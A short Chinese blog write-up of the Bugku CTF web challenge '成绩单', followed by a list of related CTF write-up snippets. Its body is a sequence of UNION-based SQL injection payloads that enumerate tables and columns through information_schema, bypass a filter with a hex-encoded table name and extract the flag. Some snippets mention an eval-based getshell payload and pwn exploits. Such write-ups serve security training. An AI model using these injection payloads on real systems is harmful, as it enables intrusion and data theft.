Bugku——成绩单(web)

原創 csu_vc 2020-06-28 15:47

可以大概判断出有四个字段
直接上payload

-1' union select 1,2,3,database()#


-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x666c3467#//这里需要用16进制绕过

-1' union select 1,2,3,skctf_flag from fl4g#
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

linux pwn练习0x01

文章目錄doubly_dangerousWarmUp關於確定溢出點的一種方法:gdb-peda關於利用ret調用shellcode函數調用方式的基本介紹pwn1just_do_it 題目 doubly_dangerous 內

yusakul 2020-07-07 13:34:36

XCTF进阶区Crypto之flag_in_your_hand write up

下載下來查看html源碼和js源碼: <html> <head> <title>Flag in your Hand</title> <style type="text/css"> body { padding-

KogRow 2020-07-07 15:59:18

linux pwn练习0x02

文章目錄tyro_shellcode tyro_shellcode OpenCTF : tyro_shellcode Baby’s first shellcode problem. Server: 172.31.1.43:161

yusakul 2020-07-07 13:34:36

docker搭建pwn环境

文章目錄拉取ubuntu鏡像運行容器安裝環境修改apt源修改pip源安裝pwntools安裝pwndbg安裝ROPgadget、libc-database、one_gadget安裝tmux與主機拷貝文件保存容器爲新鏡像示例補充添加

yusakul 2020-07-07 13:34:36

SCTF2020

Snake 在輸入的地方有一次off by one的機會通過構造堆塊重疊然後做2次double free改寫got拿到shell exp: from pwn import * p=remote('39.107.244.116',9

doudoudedi 2020-07-06 14:30:05

防灾科技学院GKCTF2020_misc wp

GKCTF_2020_misc0x01 簽到0x02 問卷調查0x03 Pokémon0x04 code obfuscation0x05 Harley Quinn0x06 Sail a boat down the river

marsxu626 2020-07-05 17:07:42

三道python反序列化题目介绍

參考鏈接 從Balsn CTF pyshv學習python反序列化 源碼以及wp:https://github.com/sasdf/ctf/tree/master/tasks/2019/BalsnCTF/misc python反序

HyyMbb 2020-07-05 01:29:41

第二届网鼎杯(第一场:青龙组)web WriteUp

學校戰隊總排名五十幾,web和pwn各拿了一個一血,只能說師傅太強了,不過後來的排名有點起飛,最後半小時,直接從前十名飛出去了~~ filejava 這道題主要考察的是java的xxe漏洞,這個題目總共有兩個功能,上傳和下載功能

HyyMbb 2020-07-05 01:29:41

python反序列化的一些介绍

基礎介紹 c:引入模塊和對象,模塊名和對象名以換行符分割。(find_class校驗就在這一步,也就是說,只要c這個OPCODE的參數沒有被find_class限制,其他地方獲取的對象就不會被沙盒影響了,這也是我爲什麼要用geta

HyyMbb 2020-07-05 01:29:41

MRCTF2020 web Ezpop_Revenge 简单记录

題目介紹 首先這是一個typecho的框架 然後通過掃目錄得到www.zip源碼泄露,然後就是審計代碼了~~ 解題過程 首先我們找到輸入點 在插件中,我們發現action()的代碼 這兒需要說明一下,這兒的action一般是自動

HyyMbb 2020-07-05 01:29:41

RCTF2020关于反序列化的一些记录

這次比賽,我只能說這就是RCTF? i了i了~~ 這次有一道web題目,是關於反序列化的,這兒稍微記錄一下其中的知識點~ 題目源碼 <?php Swoole\Runtime::enableCoroutine($flags = SW

HyyMbb 2020-07-05 01:29:41

第二届BJDCTF WEB 部分题目简要

文件探測File Detect 這個題目主要的考點爲: php字符串格式化漏洞 SSRF CBC逃逸 針對第一個考點 我們只需要在前拼接的字符串中加入%s%就可以了,這樣最後面的%就會將代碼中的%d吞掉 針對第二個考點 沒啥

HyyMbb 2020-07-05 01:29:41

2020 易博霖 CTF web

RCE_NOPAR 無字符GETSHELL就行 payload:eval(hex2bin(session_id(session_start()))) 改PHPSSEION值爲16進制就行 SSRF 把file後面的參數兩層bas

HyyMbb 2020-07-05 01:29:41

2020第五空间 web writeup

hate-php 源碼 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code =

HyyMbb 2020-07-05 01:29:31

CTF 关于linux 7z解压的一点trick

示例 假如我們可以任意文件上傳,但是後綴拼接了一個hash256(要求是上傳一個7z壓縮文件,因爲題目對應的功能是解壓後綴爲7z的文件) 1、這個時候我們可以在文件名後面加一個/ 2、此時我們的結構爲filename.zip/ha

HyyMbb 2020-07-05 01:29:31